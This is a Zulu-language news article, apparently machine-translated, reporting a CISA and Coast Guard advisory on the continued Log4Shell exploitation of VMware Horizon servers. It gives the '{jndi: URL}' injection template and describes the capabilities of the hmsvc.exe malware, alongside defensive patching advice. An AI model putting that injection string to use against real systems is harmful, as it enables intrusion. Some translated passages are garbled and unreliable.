I-US Cyber Security and Infrastructure Agency (CISA) kanye ne-US Coast Guard Cyber Command (CGCYBER) bamemezele ngezeluleko zezokuphepha ku-inthanethi (CSA) ukuthi Ubungozi be-Log4Shell (CVE-2021-44228) zisaxhashazwa abaduni.
Kwamaqembu ama-hacker atholakele abasasebenzisa ubuthakathaka lokhu "APT" futhi kutholakale ukuthi bebehlasela kumaseva e-VMware Horizon kanye neSango Lokufinyelela Elihlanganisiwe (UAG) ukuze uthole ukufinyelela kokuqala ezinhlanganweni ezingasebenzisanga iziqephu ezitholakalayo.
I-CSA ihlinzeka ngolwazi, okuhlanganisa amaqhinga, amasu, nezinqubo kanye nezinkomba zokuyekethisa, olutholakala ezenzweni ezimbili eziphathelene nezimpendulo zezigameko kanye nokuhlaziywa kwe-malware yamasampuli atholwe kumanethiwekhi ezisulu.
Kulabo abangazie Log4Shell, kufanele wazi ukuthi lokhu kusengozini eyaqala ukuvela ngoDisemba futhi yagxila kakhulu ekubeni sengozini itholakala ku-Apache Log4j, okubonakala njengohlaka oludumile lokuhlela ukungena kuzinhlelo zokusebenza ze-Java, okuvumela ikhodi engafanele ukuthi isetshenziswe lapho inani elifomethwe ngokukhethekile libhalwa kusibhalisi ngefomethi ethi "{jndi: URL}".
Ukuba sengozini Kuyaphawuleka ngoba ukuhlasela kungenziwa ku-Java iziceloBarekhoda amanani atholwe emithonjeni yangaphandle, isibonelo ngokubonisa amanani ayinkinga emilayezweni yamaphutha.
Kuyabonakala ukuthi cishe wonke amaphrojekthi asebenzisa izinhlaka ezifana ne-Apache Struts, Apache Solr, Apache Druid noma Apache Flink ayathinteka, kufaka phakathi iSteam, i-Apple iCloud, amaklayenti eMinecraft namaseva.
Isexwayiso esigcwele sichaza izehlakalo ezimbalwa zakamuva lapho izigebengu ze-inthanethi zisebenzise ngempumelelo ukuba sengozini ukuze bathole ukufinyelela. Okungenani ekuvumelaneni okukodwa okuqinisekisiwe, abalingisi baqoqe futhi bakhipha ulwazi olubucayi kunethiwekhi yesisulu.
Ukusesha okusongelayo okwenziwa yi-US Coast Guard Cyber Command kubonisa ukuthi abalingisi abasabisayo baxhaphaze i-Log4Shell ukuze bathole ukufinyelela kwenethiwekhi okokuqala kusulu esingadalulwanga. Balayishe ifayela le-malware elithi “hmsvc.exe.”, elenza njengesisetshenziswa sezokuphepha se-Microsoft Windows SysInternals LogonSessions.
Okushumekwe ngaphakathi kohlelo olungayilungele ikhompuyutha kuqukethe amakhono ahlukahlukene, okuhlanganisa ukugawulwa kwe-keystroke kanye nokuqaliswa kokulayishwa okukhokhelwayo okwengeziwe, futhi kunikeza isixhumi esibonakalayo esinesithombe sokufinyelela isistimu yedeskithophu ye-Windows yesisulu. Ingasebenza njengommeleli wokuqondisa nokulawula, ovumela u-opharetha oqhelile ukuthi afinyelele phambili kunethiwekhi, kusho ama-ejensi.
Ukuhlaziywa kuphinde kwathola ukuthi i-hmsvc.exe ibisebenza njenge-akhawunti yesistimu yendawo enezinga eliphezulu kakhulu lelungelo, kodwa ayizange ichaze ukuthi abahlaseli bawaphakamise kanjani amalungelo abo kulelo qophelo.
I-CISA kanye nonogada basoGwini bayancoma ukuthi zonke izinhlangano faka izakhiwo ezibuyekeziwe ukuze uqinisekise ukuthi izinhlelo ze-VMware Horizon ne-UAG ethintekile sebenzisa inguqulo yakamuva.
Isexwayiso sengeze ngokuthi izinhlangano kufanele zihlale zigcina isoftware isesikhathini futhi zibeke phambili ukuchibiyela ubungozi obaziwayo obuxhashaziwe. Izindawo zokuhlasela ezibhekene ne-inthanethi kufanele zincishiswe ngokubamba izinsiza ezibalulekile endaweni ehlukaniswe izigaba ezingenamasosha.
“Ngokusekelwe enanini lamaseva e-Horizon kusethi yethu yedatha engacishiwe (angu-18% kuphela afakwe nezichibiyelo kusukela ngoLwesihlanu olwedlule ebusuku), kusengozini enkulu yokuthi lokhu kuzothinta kabi amakhulu, uma kungenjalo izinkulungwane, zamabhizinisi. . Le mpelasonto futhi iphawula okokuqala ngqa ukubona ubufakazi bokudlondlobala okusabalele, kusuka ekufinyeleleni kokuqala kuya ekuqaleni kokuthatha izinyathelo ezinobutha kumaseva e-Horizon. "
Ukwenza kanjalo kuqinisekisa izilawuli eziqinile zokufinyelela kumjikelezo wenethiwekhi futhi akusokhaya izinsizakalo ezibhekene ne-inthanethi ezingabalulekile ekusebenzeni kwebhizinisi.
I-CISA ne-CGCYBER zikhuthaza abasebenzisi nabaphathi ukuthi babuyekeze zonke izinhlelo ezithintekile ze-VMware Horizon ne-UAG zibe izinguqulo zakamuva. Uma izibuyekezo noma ama-workaround azange asetshenziswe ngokushesha ngemva kokukhishwa kwezibuyekezo ze-VMware ze-Log4Shell , phatha wonke amasistimu e-VMware athintekile njengasengozini. Bona I-CSA Malicious Cyber Actors Qhubeka nokusebenzisa i-Log4Shell ku-VMware Horizon Systems ukuze uthole ulwazi olwengeziwe nezincomo ezengeziwe.
Okokugcina uma unentshisekelo yokwazi kabanzi ngakho, ungabheka imininingwane Kulesi sixhumanisi esilandelayo.